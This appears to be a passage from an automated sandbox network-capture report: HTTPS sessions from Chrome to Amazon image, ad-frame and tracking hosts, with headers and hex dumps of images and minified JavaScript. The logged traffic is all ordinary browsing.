                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1224INData Raw: 3c 0f d5 13 a7 df cc bf 7c b3 2a 06 d2 80 c9 72 f7 23 45 b0 78 00 fa 9a 3e 64 8a a2 c3 1a 44 d2 02 ba 3c 5d c0 d3 c4 47 0a 87 5e b3 71 a6 66 e5 ed fd fd 6d bf 02 b9 2a 33 c8 50 4c 7b 09 af 9f 4e b8 3a 87 96 db 81 7e e3 99 20 02 03 39 89 00 01 aa 39 e3 7a bd fc 63 b3 15 b5 b2 2c 84 b5 6c 12 cd 1b 02 4c 6c 0f 25 a7 ff 00 66 ab 66 8e f3 48 7f 12 ac 21 9c b6 08 80 f4 05 53 03 35 15 69 d4 6d 85 5b 0c 48 2f a6 1e 3b 95 00 cf df 9e e2 0d 55 d6 87 32 c6 ca 43 1f ad a1 ca 69 51 4a 54 cb 4d 4a 52 b5 28 c9 4a 52 84 25 00 a5 48 a1 0a ab 2d d7 c9 4c 86 ff 00 76 f9 4a 4f b7 c6 07 dc 0a cc db c6 19 9d 6b a6 33 4c 79 cc df 4d 0e 2f fd 82 cd 77 70 ba dd 8c 77 ce c4 cd 91 6d ef 5c 21 a0 b0 59 30 55 80 96 83 12 08 98 fd 0d 5b 60 36 05 cc 8b 57 ac 65 21 f2 85 c2 c0 b0 1a 43
                                                                                                                                                                                                        Data Ascii: <|*r#Ex>dD<]G^qfm*3PL{N:~ 99zc,lLl%ffH!S5im[H/;U2CiQJTMJR(JR%H-LvJOk3LyM/wpwm\!Y0U[`6We!C


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        21192.168.2.449771151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC690OUTGET /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712462_372x232_2X_en_AE._SY116_CB560039169_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 2347
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: d85c82ae-927d-4f24-b55f-e4f9c18316b3
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 08 Apr 2024 11:09:34 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sat, 16 Jul 2044 20:05:08 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 795082
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:58 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000090-IAD, cache-ewr-kewr1740023-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 86 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 07 03 04 05 06 08 02 01 09 10 00 02 01 03 01 05 06 03 07 02 07 01 00 00 00 00 01 02 00 03 04 11 05 06 12 21 31 41 07 13 51 61 71 81 22 32 91 14 62 72 83 92 a1 b1 42 c1 15 16 17 23
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1AQaq"2brB#
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC969INData Raw: f9 aa 39 dd 51 ef fc 0e 66 05 c4 e6 fe d1 3b 41 5d a3 b8 4d 9c d1 ab 1e e6 ae 7e d9 7a 9c 41 41 ce 95 23 e7 d5 a6 9d da 5f 6a d7 3a eb d5 d3 34 fe 16 2d c1 98 02 2b 57 1f 7c 74 53 d1 04 8f 68 bd 3d 2e d9 d6 96 77 dc 65 2a ab 15 65 3c 8f a8 6e 44 1c 32 9e bc d6 46 f3 8e 7d d6 fd b1 1d ae 3e cc 5d 9b 1b a2 6a e9 7b d8 4e 6f 52 d4 0e a9 e2 8b d5 3d d3 c0 f5 85 fe bd 61 61 c2 bd c2 03 80 77 54 f7 af 82 32 1b 71 03 3e 08 e3 9c 01 3f 3a ab 50 28 aa 71 99 59 ab dd 6a 08 b4 ea bb b5 35 c6 10 b6 e5 11 8e 03 08 b8 53 f4 33 1b f2 dc f2 67 f5 db 1f cd 9d f6 ea f2 3a d7 5f ed be c2 cd 8d 1b 25 ef 6a 0f ce 6f d2 8d b8 3d 5a af aa cd 2b fd 6b bc b5 7a 4f 74 dc 05 4a 7b eb 8a 4c 88 84 8d f0 c5 13 78 b6 e7 20 86 40 48 cb 6c 3b ba 20 12 39 91 f0 a2 fd 3f 8e 27 cc 4f b4 a9
                                                                                                                                                                                                        Data Ascii: 9Qf;A]M~zAA#_j:4-+W|tSh=.we*e<nD2F}>]j{NoR=aawT2q>?:P(qYj5S3g:_%jo=Z+kzOtJ{Lx @Hl; 9?'O


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        22192.168.2.44976518.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC443OUTGET /images/S/apesafeframe/ape/sf/desktop/DAsf-1.50.dcad56b6.js?csm_attribution=APE-SafeFrame HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1635INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                        Content-Length: 48888
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 46daee71-1e80-4bd2-8a0a-6255bc1c8421
                                                                                                                                                                                                        Date: Thu, 08 Aug 2024 13:23:38 GMT
                                                                                                                                                                                                        Cache-Control: max-age=15552000,public
                                                                                                                                                                                                        Last-Modified: Thu, 08 Aug 2024 13:22:39 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-088,/images/S/apesafeframe/ape/sf/desktop/DAsf-1.50.dcad56b6
                                                                                                                                                                                                        Expires: Tue, 04 Feb 2025 13:23:38 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-088 /images/S/apesafeframe/ape/sf/desktop/DAsf-1.50.dcad56b6
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Via: 1.1 6a29cf21ce984f6a6d3f67cb902ef37e.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 605609
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: UejoJZQ2fqrNdj7DhxSGEp3FYEcaXJKRHHDwoL1J_bo0aljgGQP_kA==
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC16384INData Raw: 28 28 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 2e 64 65 66 61 75 6c 74 3a 65 7d 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 3a 22 29 7d 2c 69 3d 2f 28 5c 2f 62 7c 5c 2f 73 7c 5c 2f 6c 29 2e 2a 28 6e 6f 64 65 3d 29 28 5c 64 7b 31 2c 31 32 7d 29 2f 2c 6e 3d 6e 65 77 20 4d 61 70 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 6e 2e 68 61 73 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 29 7b 76 61 72 20 65 3d 69 2e 65 78 65 63 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 74 3d 65 26 26 65 5b 33 5d 3f 65 5b 33 5d 3a 6e 75 6c 6c 3b 6e 2e 73 65 74 28
                                                                                                                                                                                                        Data Ascii: (()=>{function e(e){return e&&e.__esModule?e.default:e}var t=function(e){return e.replace(/_/g,":")},i=/(\/b|\/s|\/l).*(node=)(\d{1,12})/,n=new Map,a=function(){if(!n.has(window.location.href)){var e=i.exec(window.location.href),t=e&&e[3]?e[3]:null;n.set(
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC16384INData Raw: 74 3d 28 29 3d 3e 6e 65 77 20 64 74 28 77 69 6e 64 6f 77 2c 22 41 44 50 54 5f 53 46 5f 54 52 41 4e 53 50 41 52 45 4e 43 59 5f 49 4e 46 4f 5f 4d 41 4e 44 41 54 4f 52 59 5f 46 4f 52 5f 45 55 5f 37 31 32 39 32 31 22 29 2c 63 74 3d 28 29 3d 3e 6e 65 77 20 64 74 28 77 69 6e 64 6f 77 2c 22 41 44 50 54 5f 53 46 5f 52 45 53 49 5a 45 5f 41 53 50 45 43 54 5f 52 41 54 49 4f 5f 39 30 39 32 32 36 22 29 2c 6d 74 3d 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73 74 20 69 3d 6e 65 77 20 53 65 74 28 5b 22 62 66 34 61 62 33 64 62 2d 36 31 38 61 2d 34 38 35 33 2d 61 65 38 39 2d 33 61 64 33 62 64 31 37 64 66 31 36 22 2c 22 64 64 34 63 35 65 36 31 2d 66 65 39 61 2d 34 64 39 31 2d 39 64 65 62 2d 32 35 66 61 36 30 35 35 37 37 31 39 22 2c 22 64 61 33 32 36 65 34 61 2d 39 30 62 64 2d 34 64
                                                                                                                                                                                                        Data Ascii: t=()=>new dt(window,"ADPT_SF_TRANSPARENCY_INFO_MANDATORY_FOR_EU_712921"),ct=()=>new dt(window,"ADPT_SF_RESIZE_ASPECT_RATIO_909226"),mt=(e,t)=>{const i=new Set(["bf4ab3db-618a-4853-ae89-3ad3bd17df16","dd4c5e61-fe9a-4d91-9deb-25fa60557719","da326e4a-90bd-4d
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC16120INData Raw: 6e 63 20 65 3d 3e 44 69 28 29 2e 61 64 64 53 70 6f 6e 73 6f 72 65 64 4c 61 62 65 6c 28 4e 69 28 65 29 29 2c 4e 69 3d 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 65 2e 61 64 50 6c 61 63 65 6d 65 6e 74 4d 65 74 61 44 61 74 61 2c 69 3d 65 2e 61 64 46 65 65 64 62 61 63 6b 49 6e 66 6f 3b 76 61 72 20 6e 3b 72 65 74 75 72 6e 7b 70 61 72 65 6e 74 48 74 6d 6c 49 64 3a 63 74 28 29 2e 69 73 54 31 28 29 3f 6e 75 6c 6c 21 3d 3d 28 6e 3d 65 2e 61 64 55 6e 69 74 57 72 61 70 70 65 72 49 64 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 65 2e 61 64 55 6e 69 74 50 6c 61 63 65 6d 65 6e 74 49 64 3a 74 2e 61 64 45 6c 65 6d 65 6e 74 49 64 2c 70 6c 61 63 65 6d 65 6e 74 3a 7b 69 64 3a 65 2e 70 6c 61 63 65 6d 65 6e 74 49 64 2c 6e 61 6d 65 3a 65 2e 70 6c 61 63 65 6d 65 6e 74 4e 61 6d 65
                                                                                                                                                                                                        Data Ascii: nc e=>Di().addSponsoredLabel(Ni(e)),Ni=e=>{const t=e.adPlacementMetaData,i=e.adFeedbackInfo;var n;return{parentHtmlId:ct().isT1()?null!==(n=e.adUnitWrapperId)&&void 0!==n?n:e.adUnitPlacementId:t.adElementId,placement:{id:e.placementId,name:e.placementName


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        23192.168.2.449774151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC690OUTGET /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712472_372x232_2X_en_AE._SY116_CB560039169_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 3241
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: a6f7d54e-8187-4db7-8e11-3c18b6fee555
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 08 Apr 2024 11:09:34 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Tue, 28 Jun 2044 07:40:18 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 161874
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:58 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100103-IAD, cache-ewr-kewr1740077-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 8f 00 01 00 00 07 01 01 00 00 00 00 00 00 00 00 00 00 00 01 03 04 05 06 07 08 02 09 10 00 02 01 03 02 04 03 04 08 03 07 05 00 00 00 00 01 02 00 03 04 11 05 21 06 12 31 41 13 51 61 07 22 71 91 08 14 32 42 62 81 a1 b1 15 52 c1 16 23 33 44
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1AQa"q2BbR#3D
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC1378INData Raw: 72 e8 8d bb 23 15 29 ce ff 00 8f 94 f2 aa 8d 90 19 96 67 cb cc fe 92 8a c9 2a 5b 23 53 2e cc a4 fb a1 b7 2b e8 a7 ae 3d 25 48 da 5a 98 a2 95 eb 54 64 bc e5 b7 6b 26 44 a9 f0 81 02 53 90 41 20 cb b0 9a 69 08 88 84 11 11 01 11 10 11 11 01 11 10 39 ff 00 e9 17 ae 9b 2d 1a cf 4e 4e b7 f7 19 6f 54 b6 c3 9f f7 0a 4e 6a f6 7b c0 35 f8 eb 51 36 14 aa 78 34 d2 93 3d 6a fc bc dc 83 a2 81 ea ed fa 06 33 6e fd 26 09 fa f6 87 e4 2d ae 7e 7c e9 29 be 8f ba 88 d3 34 ee 34 bd 6e b4 28 51 6f c9 29 dc bc 86 91 e2 ae 73 4a 9c ca ad 8c 64 09 e9 57 98 a8 c8 19 23 73 b0 19 ee 4f 60 3b 9e d2 52 2f 2a a2 f9 28 93 14 64 a8 ce 32 7a 9e 83 e3 0b 20 c3 04 8d 8e 09 dc 6e 0e 3c 8f 71 28 2e 48 1b 7e 25 95 ec b8 2c 33 9c 13 b8 dc 1f 84 ab b0 d0 6b 6a e9 aa bd 16 c1 b1 b2 35 ca e3 3e 22
                                                                                                                                                                                                        Data Ascii: r#)g*[#S.+=%HZTdk&DSA i9-NNoTNj{5Q6x4=j3n&-~|)44n(Qo)sJdW#sO`;R/*(d2z n<q(.H~%,3kj5>"
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC485INData Raw: 0f ac e2 ad f5 bd 1f 3a 7b 81 d7 94 12 4c be 2a ad ba fb b8 0a 3c bb f6 1b fc 84 c0 f8 44 d8 68 aa b6 26 a3 2d 6a ae d8 7a ce cf e3 31 cb f2 53 a8 ec ed b0 dd 69 b3 73 60 12 33 86 23 20 fa f7 d7 6e 4a d3 ff 00 0a 91 38 c7 46 6e ed f0 ec 3e 7d e6 95 bc 5a 37 0c 2f 49 c7 33 12 bb 44 44 b3 12 22 20 22 22 02 22 20 22 22 02 61 9c 4e 84 d1 7f 87 ed bc cc e6 39 ae d0 35 29 b8 03 b1 95 b4 6e b3 0b 56 75 68 96 a4 b9 39 a6 66 15 76 c7 1c 83 ab b2 0c 7a 67 2d fe 9c cc d6 f2 8d 55 a7 c9 ca 79 a5 96 d3 45 b8 7a ad 51 d7 0a 14 72 ee 0e 49 39 33 ce af 1e f3 6f 30 f4 a7 3d 22 3d ae 37 1d 65 3d 8d 3f 1a f2 d9 7f 1e 7f f5 04 ca ca f4 1f 6c a9 06 5c 38 7b 4b aa 6e 92 ab ae 15 55 be 6d 81 fb 66 4e 3c 17 ef 5d c2 2f 9a bd 2d a9 6d dd 26 87 85 4d 65 d5 ba 19 26 d9 79 51 44 9f
                                                                                                                                                                                                        Data Ascii: :{L*<Dh&-jz1Sis`3# nJ8Fn>}Z7/I3DD" """ ""aN95)nVuh9fvzg-UyEzQrI93o0="=7e=?l\8{KnUmfN<]/-m&Me&yQD


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        24192.168.2.44977254.78.35.1964434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:58 UTC789OUTGET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:XRRBVETR66S3T97BM5KF$uedata=s:%2Frd%2Fuedata%3Fstaticb%26id%3DXRRBVETR66S3T97BM5KF:0 HTTP/1.1
                                                                                                                                                                                                        Host: fls-eu.amazon.ae
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC176INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:59 GMT
                                                                                                                                                                                                        Content-Type: image/gif
                                                                                                                                                                                                        Content-Length: 43
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        x-amzn-RequestId: b5afa966-5576-42b6-857c-5135553ef10f
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                        Data Ascii: GIF89a!,L;


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        25192.168.2.449778151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC749OUTGET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.html HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC1366INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 167
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        X-Amz-IR-Id: 9989c84c-d92a-4437-93c1-a28cf89f9497
                                                                                                                                                                                                        Cache-Control: max-age=15552000,public
                                                                                                                                                                                                        Last-Modified: Thu, 08 Aug 2024 13:22:36 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                        Expires: Tue, 04 Feb 2025 13:23:38 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:59 GMT
                                                                                                                                                                                                        Age: 605616
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000154-IAD, cache-nyc-kteb1890045-NYC
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC75INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
